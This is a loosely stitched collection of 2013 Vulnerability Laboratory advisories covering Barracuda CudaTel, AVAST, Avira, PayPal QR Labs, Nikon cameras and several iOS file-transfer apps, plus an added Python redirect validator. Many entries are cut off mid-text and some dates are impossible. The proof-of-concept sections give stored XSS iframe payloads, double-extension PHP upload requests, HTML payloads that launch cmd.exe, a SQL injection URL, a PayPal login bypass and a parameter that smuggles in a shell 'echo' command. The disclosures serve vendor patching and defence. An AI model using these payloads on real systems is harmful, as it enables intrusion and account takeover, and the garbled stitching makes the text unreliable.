2013-02-20: Vendor Fix/Patch

Risk:
=====
The security risk of the redirection vulnerability is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meis...@vulnerability-lab.com)
Barracuda Networks [Security Team] - Dave Farrow (Communication Coordination)
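The "allow only local file requests" fix from the Solution section, as an added example that is not Barracuda's code: the check accepts a returnTo value only when it decodes to a same-site absolute path and otherwise sends the user to a fixed default (the default path and the function names are assumptions for this example).

```python
# Added example, not Barracuda's code: a validator for a "returnTo"-style
# redirect parameter that accepts only a same-site absolute path, as the
# advisory's solution recommends, and otherwise falls back to a fixed default.
from urllib.parse import unquote, urlsplit

# Where to send the user when the supplied target is rejected (assumption).
DEFAULT_RETURN_TO = "/showApplicationShortcuts.do"


def check_return_to(value):
    """Return (accepted, reason) for one returnTo value.

    The reason string is meant for logging: a rejected value on a live
    appliance is a signal that someone is crafting redirect links.
    """
    if not isinstance(value, str) or not value:
        return False, "empty"
    # The parameter arrives URL-encoded (e.g. %2FshowApplicationShortcuts.do);
    # decode once so an encoded "//" or ":" cannot hide from the checks.
    target = unquote(value)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False, "control character"
    if not target.startswith("/"):
        # Covers http://..., https://..., javascript:, and relative paths.
        return False, "not an absolute local path"
    if target.startswith("//") or "\\" in target:
        # //host is scheme-relative; browsers treat /\host the same way.
        return False, "scheme-relative or backslash host"
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return False, "scheme or host present"
    return True, "ok"


def safe_return_to(value, default=DEFAULT_RETURN_TO):
    """The target to redirect to: the validated local path or the default."""
    accepted, _reason = check_return_to(value)
    return unquote(value) if accepted else default


if __name__ == "__main__":
    # Constructed samples in the shape of the advisory's two URLs.
    for v in ("%2FshowApplicationShortcuts.do",
              "http://www.vulnerability-lab.com",
              "//www.vulnerability-lab.com",
              "/%5Cwww.vulnerability-lab.com",
              "/showApplicationShortcuts.do?resourceId=1"):
        print(v, "->", check_return_to(v), "->", safe_return_to(v))
```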
Bluetooth Chat Connect v1.0 iOS - Multiple Vulnerabilities
user name with a secure filter mask. Escape, filter or encode the message listing to prevent the execution of persistent script codes.
1.2 The denial of service issue can be patched by a secure parse of the collision when processing to handle the same string 2 times as message.

Risk:
=====
1.1 The security risk of the persistent input validation web vulnerability in the client is estimated as medium(+).
1.2 The security risk of the remote denial of service vulnerability in the client is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) [www.vulnerability-lab.com]
eFile Wifi Transfer Manager 1.0 iOS - Multiple Vulnerabilities
; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
DNT=1
X-Requested-With=XMLHttpRequest
X-File-Name=1234.png.txt.iso.php.gif
Content-Type=application/octet-stream
Referer=http://localhost:8080/
Content-Length=98139
POSTDATA =?PNG[X] + double extensions

http://localhost:8080/[PATH NAME (x) VALUE].png.txt.iso.php

// return false to cancel submit
onSubmit: function(id, fileName){},
onProgress: function(id, fileName, loaded, total){},
onComplete: function(id, fileName, responseJSON){},
onCancel: function(id, fileName){},
// messages
messages: {
    typeError: "{file} has invalid extension. Only {extensions} are allowed.",
    sizeError: "{file} is too large, maximum file size is {sizeLimit}.",
    minSizeError: "{file} is too small, minimum file size is {minSizeLimit}.",
    emptyError: "{file} is empty, please select files again without it.",
    onLeave: "The files are being uploaded, if you leave now the upload will be cancelled."
},
...
...
// added to list item when upload completes
// used in css to hide progress spinner
success: 'qq-upload-success',
...

1.2 The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low required user interaction.

For demonstration or reproduce ...

New Folder ...
POST http://localhost:8080/#
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8080/]
Connection[keep-alive]
Post Data:
newFolder[%2520%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]+src%3Da%3E]
submitButton[Create]
Response Headers:
Transfer-Encoding[chunked]
Accept-Ranges[bytes]
Date[Sun, 23 Jun 2013 10:16:41 GMT]

http://localhost:8080/[PATH NAME (x) VALUE]

function newFolder() {
    var title = document.getElementById('formTitle');
    title.innerText = 'eFile';
    title.textContent = 'eFile';
    title.setAttribute('id', 'formTitle');
    ...
    ...
    var message = document.getElementById('formMessage');
    message.innerText = 'Enter new folder name';
    message.textContent = 'Enter new folder name';
    message.setAttribute('id', 'formMessage');
    ...

Reference(s):
../pagescript.js

Solution:
1.1 The arbitrary file upload vulnerability can be patched by a secure parse and restriction in the file upload module and the bound listing access.
1.2 The persistent input validation web vulnerability can be patched by a secure parse of the foldername. Parse the input fields of new folder and also the index output listing to prevent persistent injections or script code executions.

Risk:
1.1 The security risk of the multiple arbitrary file upload vulnerability and restriction bypass is estimated as critical.
1.2 The security risk of the persistent input validation web vulnerability is estimated as high.

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
Mobile USB Drive HD 1.2 - Arbitrary File Upload Vulnerability
/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:8080/]

21:01:43.184[125ms][total 177ms] Status: 200[OK]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[98139] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:8080/]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Accept-Ranges[bytes]
Content-Length[98139]
Date[Do., 27 Jun 2013 19:06:58 GMT]

21:01:43.389[2393ms][total 2393ms] Status: 200[OK]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif
Load Flags[LOAD_NORMAL] Content Size[98139] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[98139]
Date[Do., 27 Jun 2013 19:07:00 GMT]

Risk:
1.1 The security risk of the arbitrary file upload vulnerability and the multiple extensions issue is estimated as high.

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities
Solution:
2013-03-14: Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]

Note: The upgrade is available to all customers of the appliance module and can be applied automatically or manually in the customer center of Barracuda Networks.

Risk:
The security risk of the (multiple) client side input validation vulnerabilities in the siplist and list module is estimated as medium.

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Barracuda CudaTel 2.6.02.04 - Persistent Web Vulnerability
Title:
Barracuda CudaTel 2.6.02.04 - Persistent Web Vulnerability

Date:
2013-06-21

References:
http://vulnerability-lab.com/get_content.php?id=777
BARRACUDA NETWORK SECURITY ID: BNSEC-834

VL-ID:
777

Common Vulnerability Scoring System: 3.5

Introduction:
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server's enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution: With an expansive feature set and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )

Abstract:
The Vulnerability Laboratory Research Team discovered a client side web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.
Report-Timeline:
2012-11-26: Researcher Notification Coordination (Chokri Ben Achour)
2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2013-04-03: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2013-05-02: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow]
2012-06-00: Public Disclosure (Vulnerability Laboratory)

Status:
Published

Affected Products:
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040

Exploitation-Technique:
Remote

Severity:
Medium

Details:
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

The input validation vulnerability allows remote attackers to inject own malicious persistent script code on the application side of the vulnerable module. The vulnerability is located in the `find me` module of the `call forwarding` function when processing to request manipulated parameters via `add listing`. Local low privilege application user accounts can inject persistent script code to exploit higher privilege web application accounts. The remote bug can be exploited by a remote attacker with a low privileged application user account and low required user interaction. Successful exploitation of the vulnerabilities results in persistent session hijacking, persistent external redirects to malware or malicious sites, persistent phishing and persistent web context manipulation (vulnerable module).

Vulnerable Section(s):
[+] Find Me

Vulnerable Module(s):
[+] Call Forwarding - Add

Vulnerable Parameter(s):
[+] Calling Sequence - Listing

Proof of Concept:

Solution:
The vulnerability can be patched by parsing the listed (output) web context after processing to add. Also restrict the input fields and disallow special chars or wrong strings.
2013-05-02: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow]

Risk:
The security risk of the persistent input validation vulnerability is estimated as medium.

Credits:
Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meis...@vulnerability-lab.com)
AVAST Universal Core Installer - Multiple Vulnerabilities
) Click Next twice until you reach the Installation Information Window
e) Scroll down and you should be able to see our Injected Payload.
f) If you click on ClickME you should get a CMD shell spawned on the local system, hence proving the existence of this vulnerability.
g) If you proceed with the installation and continue, the installation will fail eventually and once again in the Final Install Log you will see the executed payload.

Note: All tests were performed on a system running the latest version of Microsoft Windows 7 OS.

Solution:
By default, no user should be allowed to inject HTML code in the application. This can be mitigated by performing proper input sanitization of the vulnerable fields. All illegal characters should also be escaped and application source code should be hardened overall. Proper input encoding and format parse in the source code will fix this issue.

Risk:
The security risk of these kinds of vulnerabilities is estimated as medium(+).

Credits:
Vulnerability Laboratory [Research Team] - Ateeq Khan [at...@evolution-sec.com]
Paypal Bug Bounty #102 QR Dev Labs - Auth Bypass Vulnerability
Title:
Paypal Bug Bounty #102 QR Dev Labs - Auth Bypass Vulnerability

Date:
2013-07-05

References:
http://www.vulnerability-lab.com/get_content.php?id=995
PayPal Security UID: ZVf25kC

VL-ID:
995

Common Vulnerability Scoring System: 7.1

Introduction:
Shopping made easy with PayPal QR enabled on your mobile device. You can scan for deals using the QR Code displayed in shops, train stations, bus-stop banners and purchase items in just a few taps. Make the shopping experience easy for your customer.

(Copy of the Vendor Homepage: https://qr.paypal-labs.com )

Abstract:
An independent vulnerability laboratory researcher discovered an auth bypass web session vulnerability in the PayPal QR Labs Service Web Application.

Report-Timeline:
2012-05-11: Researcher Notification Coordination (Cernica Ionut)
2013-05-14: Vendor Notification (PayPal Inc Security Incident Team - Bug Bounty Program)
2013-06-20: Vendor Fix/Patch (PayPal Inc Developer Team)
2013-07-05: Public Disclosure (Vulnerability Laboratory)

Status:
Published

Affected Products:
PayPal Inc
Product: QR Labs Online Service - Web Application 2013 Q2

Exploitation-Technique:
Remote

Severity:
High

Details:
An auth bypass session web vulnerability is detected in the official PayPal QR Labs Service Web Application. The vulnerability allows remote attackers to bypass the web- or system user auth of the affected vulnerable computer system to compromise paypal accounts.

The bug is located in the application account login module when processing to load manipulated j_password parameters via GET method. Attackers are able to decrypt and exchange the information in the request live with a session tamper to take over other accounts. At the end the vulnerability allows remote attackers to enter remotely any paypal qr labs account of the web application. Exploitation of the vulnerability does not require user interaction but a low privileged paypal qr labs application user account.
Successful exploitation results in account steal or compromise and stable user session manipulation with different effects.

Vulnerable Service(s):
[+] PayPal Inc - qr.paypal-labs.com

Vulnerable Module(s):
[+] Account - Login

Vulnerable Parameter(s):
[+] j_password

Affected Module(s):
[+] Account System

Proof of Concept:
The vulnerability can be exploited by remote attackers with a low privilege paypal qr labs application user account and without user interaction.

For demonstration or reproduce ...

Note: After some security checks to authenticate in the qr.paypal-labs.com web application, the last request for being authenticated in this web application is not securely implemented.

Affected Link: https://qr.paypal-labs.com/j_security_check?j_username=loger...@gmail.com&j_password=96301aa9f02b5d12278b0e902dc5434ed9477d19

Note: If we look at the request, which is a GET method request, we will soon see ... If we encrypt the j_username parameter value as SHA1 ... The result will be the value of the j_password parameter.

Note: PoC Video
The username loger...@gmail.com encrypted in SHA1 equals 96301aa9f02b5d12278b0e902dc5434ed9477d19.
In the demonstration above it seems that the password of the username is encrypted in SHA1 ;)

Solution:
2013-06-20: Vendor Fix/Patch (PayPal Inc Developer Team)

Risk:
The security risk of the auth bypass web session vulnerability is estimated as high(+).

Credits:
Independent Security Researcher - Cernica Ionut Cosmin (ionut.cern...@whit3hat.com)
AVAST Antivirus v8.0.1489 - Multiple Core Vulnerabilities
to the `Offline Registration` section and click on ``Enter the License Key``
d) Enter the following payload <h1>Vulnerable</h1> and click OK
e) You should now see the entered string `Vulnerable` in Heading 1 format, proving the existence of this vulnerability.

Proof of Concept #2 Local Image File Include

For reproducing the Local File include through img tag bug successfully, please follow the below mentioned steps:
a) Right Click on Avast Tray Icon and click on ``Registration Information``
b) Scroll down to the `Offline Registration` section and click on ``Enter the License Key``
c) Enter the following payload <img src="file:///YOURFILE"></img> and click OK
d) You should now see the local image file loaded successfully from your system, proving the existence of this vulnerability.

Note: For POC #2 I copied a file called logo.png to my C:/ folder and used the following payload to produce the bug <img src="file:///C:/logo.png"></img>

Proof of Concept #3 Command Shell on Local System (cmd.exe)

For reproducing the bug, please follow these below mentioned steps:
a) Right Click on Avast Tray Icon and click on ``Registration Information``
b) Scroll down to the `Offline Registration` section and click on ``Enter the License Key``
c) Enter the following payload <a href="cmd"> and click OK
d) You should now see the cmd.exe file loaded successfully from your system, proving the existence of this vulnerability.
e) You can also use the payloads mentioned under the next section for some interesting results:

Interesting Payloads:
<a href="test.com">
<a href="explorer.exe">
<a href=
<a href="shell:System">
<a href="calc">
<a href="mspaint.exe">
<a href="notepad.exe">

Please note: All tests were performed on a system running the latest version of Microsoft Windows 7 OS.

POC Technical Description

Here, we used the common HTML tags as our payload. The fact that user injected HTML code is being executed successfully raises concerns for this core application's security.
Then, the fact that using just the a href tag, we can easily bypass the AVAST Sandbox and gain a local system shell with the privileges of the user that installed the application initially, which in most cases will be administrator, is very critical. I believe this bug can be further escalated to gain more interesting results. I also wanted to test the License file for input validation but I haven't been able to perform that test yet due to not having access to a proper license file. I intend to test that feature because I believe it might also be vulnerable.

Solution:
By default, no user should be allowed to inject HTML code in the application. This can be mitigated by performing proper input sanitization of the vulnerable fields. All illegal characters should also be escaped and application source code should be hardened overall. Proper input sanitization in the source code will fix this issue.

Risk:
The security risk of the detected software vulnerabilities is estimated as medium(+).

Credits:
Vulnerability Laboratory [Research Team] - Ateeq Khan [at...@vulnerability-lab.com]
Avira Analysis Web Service - SQL Injection Vulnerability
Title:
Avira Analysis Web Service - SQL Injection Vulnerability

Date:
2013-07-08

References:
http://www.vulnerability-lab.com/get_content.php?id=997

VL-ID:
997

Common Vulnerability Scoring System: 8.5

Abstract:
The Vulnerability Laboratory Core Research Team discovered a critical SQL Injection vulnerability in the Avira Analysis online service application.

Report-Timeline:
2013-05-25: Vendor Notification
2013-05-26: Vendor Response/Feedback
2013-06-31: Vendor Fix/Patch
2013-07-08: Public Disclosure

Status:
Published

Affected Products:
Avira
Product: Analysis - Web Application Online Service 2013 Q2

Exploitation-Technique:
Remote

Severity:
Critical

Details:
A remote SQL Injection web vulnerability is detected in the official Avira Analysis online service application. The vulnerability allows remote attackers to inject own sql commands to compromise the affected application dbms.

The SQL Injection vulnerability is located in the `overview` file when processing to request the manipulated `uniqueid` parameter. By manipulation of the `uniqueid` parameter the attackers can inject own sql commands to compromise the webserver application dbms. When processing to bypass the filter validation by trying to use a single quote or a double quote to check if the parameter is vulnerable or not, attackers will be redirected to another page, but when the attacker is processing to request with a back-slash the context will be executed and new mysql errors will become visible for exploitation.

The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. Successful exploitation of the sql injection vulnerability results in web application and online service dbms compromise.
Vulnerable Module(s): [+] en Vulnerable File(s): [+] overview Vulnerable Module(s): [+] uniqueid Proof of Concept: = The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ... Vulnerable Service Domain: analysis.avira.com Vulnerable Module: en Vulnerable File:overview Vulnerable Parameter: uniqueid Note: When trying to use a single qoute or a double qoute to check if the parameter is vulnerable or not, you will be redirected to another page, but when processing to load with a back-slash new mysql errors will become visible for exploitation. POC: https://analysis.avira.com/en/overview?start=0uniqueid=1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg\[SQL INJECTION VULNERABILITY!] PoC Video: http://www.youtube.com/watch?v=Odko5PTKA-Q Reference(s): https://analysis.avira.com/ Solution: = The vulnerability can be patched by a restriction and secure parse of the uniqueid parameter request. Risk: = The security risk of the remote sql injection web vulnerability is estimated as critical. Credits: Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [Zigoo] (ebra...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
.png.gif.php.js.html</a></td><td>27,27KB</td><td align=center>2013-07-08 23:07:52</td><td align=center><a onclick=javascript:delfile(1337.png.gif.php.js.html); class=transparent_button>Delete</a></td></tr>

1.3
<tr><td><img src=Air%20Drive%20-%20Files_files/file.png height=20px width=20px></td><td><a target=_blank href=http://192.168.2.104:8000/AirDriveAction_file_show/[PERSISTENT INJECTED SCRIPT CODE!]1337.png>[PERSISTENT INJECTED SCRIPT CODE!]1337.png</a></td><td>27,27KB</td><td align=center>2013-07-08 23:07:52</td><td align=center><a onclick=javascript:delfile([PERSISTENT INJECTED SCRIPT CODE!]1337.png); class=transparent_button>Delete</a></td></tr>

--- Session Request Log ---
Status: 302[Found]
POST http://localhost:8000/AirDriveAction_file_add
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[83] Mime Type[text/html]
Request Headers:
Host[localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8000/index_files.html]
Connection[keep-alive]
Post Data:
POST_DATA[-228191371227676
Content-Disposition: form-data; name=uploadfile; filename=;/private/var/mobile/Applications/1337.png

Reference(s):
http://localhost:8000/AirDriveAction_file_add

Risk:
The security risk of the arbitrary file upload vulnerability and the multiple-extensions issue is estimated as high(+).

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
Copyright © 2013 | Vulnerability Laboratory
Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue
Title:
Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue

Date:
2013-07-16

References:
http://www.vulnerability-lab.com/get_content.php?id=1014

VL-ID:
1014

Common Vulnerability Scoring System:
3.5

Introduction:
Attractive, sturdy and easy to use, the 16-megapixel COOLPIX L27 25 is clever with images, so you don't have to be. Simple controls and smart automatic technology deliver steady images and ensure you capture portraits with smiling faces and open eyes, through the NIKKOR wide-angle 5x optical zoom lens. A large 6.7-cm (2.7-in.) LCD screen displays images with superb clarity at any time of day or night and you can switch to filming the action at the touch of a button, or set the camera to Easy Auto mode and capture photos without worrying about a thing.

(Copy of the Vendor Homepage: http://www.europe-nikon.com/en_GB/product/digital-cameras/coolpix/life/coolpix-l27 )

Abstract:
The Vulnerability Laboratory Research Team discovered an information disclosure issue in the Nikon CoolPix L25 digital camera with firmware 1.0.

Report-Timeline:
2013-07-16: Public Disclosure (Vulnerability Laboratory)

Status:
Published

Affected Products:
Nikon
Product: COOLPIX L25, L27, L28

Exploitation-Technique:
Hardware

Severity:
Medium

Details:
An information disclosure issue has been detected in Nikon's official L series cameras (L25 and L28, possibly others). The bug allows anyone with physical access to the camera to view pictures of a previous owner, and with them potentially sensitive information about other people, websites, servers or companies.

The privacy issue is located in the menu system module that saves a start picture ("Startbild") shown when the camera boots. The camera stores the chosen start picture in internal memory and does not remove it when the device is formatted or the firmware is reset. Anyone holding the device can open the short preview of the start picture and see pictures the previous owner believed had been deleted.
The device does not recognise the leftover data and keeps the pictures stored, with no way to delete them. In a real-world scenario we bought a Nikon camera from a private seller on eBay. He had used the camera for about two years for holiday trips and conferences, and confirmed by mail that the camera had been formatted and the firmware reset. When the camera arrived at our location we looked into the short preview of the start picture and saw several images belonging to the previous owner.

Proof of Concept:
The information disclosure issue can be reproduced by local attackers with physical access to the camera device.

Steps to reproduce ...
1. Start the Nikon L series camera
2. Switch to shooting mode and take a picture
3. Go to System > Start Picture (Startbild)
4. Choose your own picture and save it as the start picture
5. Shut the camera down the regular way and start it again after a few seconds
6. The chosen image is shown while the system boots
7. Open the Menu, go to System and format the device
8. Open the Menu again and switch to System
9. After the format, reset the device
10. Shut the Nikon camera down and, of course, remove the SD card
11. Restart it, open the menu and enter the start picture (Startbild) module
12. The image is still visible even though a full hardware reset and a format were performed
13. Information disclosure issue in the Nikon L series successfully reproduced!

Note: Once an image has been saved in the camera as the start picture, neither a format nor a firmware reset removes it. The usual "format before selling" advice therefore does not protect the previous owner's pictures on these models.

Solution:
To fix the vulnerability, the firmware reset and the format operation must also remove all pictures from the start picture review menu.

Risk:
The security risk of the information disclosure issue is estimated as medium(-).

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability
--- Session Log ---
Status: 200[OK]
POST http://192.168.2.104:41495/?type=createdir&guid=EFB7891B-84ED-4C48-A404-95960BBB95D0
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[506] Mime Type[text/plain]
Request Headers:
Host[192.168.2.104:41495]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html, */*; q=0.01]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type=child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Content-Length[87]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
item0[%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.vuln-lab.com%20onload%3Dalert(%22BKM%22)%20%3C]
(URL-decoded, the folder name submitted is: <iframe src=http://www.vuln-lab.com onload=alert("BKM") <)
Response Headers:
Accept-Ranges[bytes]
Content-Length[506]
Content-Type[text/plain]
Date[Thu, 11 Jul 2013 18:14:33 GMT]

20:08:50.658[40ms][total 40ms]
Status: 404[Not Found]
GET http://192.168.2.104:41495/%3C/a
Load Flags[LOAD_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:41495]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type=child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[Thu, 11 Jul 2013 18:14:34 GMT]

Solution:
To fix the vulnerability, parse and restrict the "add folder" name input field, and HTML-encode the folder name when it is written into the affected listing module. Folder entries that have already been injected must also be cleaned up, since the payload persists on the device until they are removed.

Risk:
The security risk of the persistent input validation web vulnerability is estimated as high(-).

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability
Title:
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability

Date:
2013-07-15

References:
http://www.vulnerability-lab.com/get_content.php?id=776
BARRACUDA NETWORK SECURITY ID: BNSEC-807

VL-ID:
776

Common Vulnerability Scoring System:
2.1

Introduction:
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server's enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution: with an expansive feature set and no per-user or per-phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produce an unparalleled audio experience. VoIP encryption protects calls from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )

Abstract:
The Vulnerability Laboratory Research Team discovered a client-side web vulnerability in the Barracuda Networks CudaTel v2.6.002.040 appliance application.

Report-Timeline:
2012-11-26: Researcher Notification & Coordination
2012-11-27: Vendor Notification
2012-12-01: Vendor Response/Feedback
2013-04-03: Vendor Fix/Patch
2013-07-15: Public Disclosure

Status:
Published

Affected Products:
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040

Exploitation-Technique:
Remote

Severity:
Medium

Details:
A client-side input validation vulnerability has been detected in the Barracuda Networks CudaTel v2.6.002.040 appliance application.
The non-persistent vulnerability allows remote attackers to manipulate website links in order to provoke malicious client-side (application-side) requests. The second (client-side) vulnerability is located in the `error: Internal Error` exception handling. When a remote attacker provokes an invalid request, the exception handling displays the earlier inserted host name (bbx_hostname) together with any malicious web context it carries (e.g. script code), without encoding it. The attacker can use the vulnerable bbx_backup_site_host parameter of the "test connection" listing module to trigger such an exception-handling response. Successful exploitation results in client-side phishing, client-side session hijacking and client-side redirects to malware or malicious websites. Exploitation requires medium user interaction.

Vulnerable Section(s):
[+] Test - Connection

Vulnerable Module(s):
[+] Exception-handling [Internal Error] - Listing

Vulnerable Parameter(s):
[+] bbx_backup_site_host

Proof of Concept:
The vulnerability can be exploited by remote attackers with low or medium required user interaction and without a privileged application user account. For demonstration or reproduction ...

Review: Exception-handling [Internal Error] - Listing [bbx_backup_site_host]

<pre>--- error: Internal error.\n[backup] Can't connect to \<iframe src=test3-Dateien/a.htm href=http://vuln-lab.com/?content-type=text/html;http://vuln-lab.com/><a></pre></body></html></iframe></pre>

PoC:
http://cudatel.ptest.cudasvc.com/gui/backup/test?_=1353975862209&bbx_backup_site_id=2&bbx_backup_site_type=ftp&bbx_backup_site_host=%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E&bbx_backup_site_port=8&bbx_backup_site_user=BENJAMINKM&bbx_backup_site_path=%2F+%26+echo+%3E+%2Fdata%2Fsounds%2Fmusic%2F8%2F2a10577f-6764-4368-8571-44d42e4695ff

Solution:
The vulnerability can be patched by parsing the vulnerable bbx_backup_site_host parameter request.
Parse the internal error exception handling when it displays the error string of the requested parameter (error context), i.e. HTML-encode the host name before it is written into the error message.

2013-04-03: Vendor Fix/Patch
Note: Barracuda Networks provided a download in the customer section and also an automatic update to patch the issue in the appliance series.

Risk:
The security risk of the client-side input validation vulnerability is estimated as medium(-) because its main location is the exception handling.

Credits:
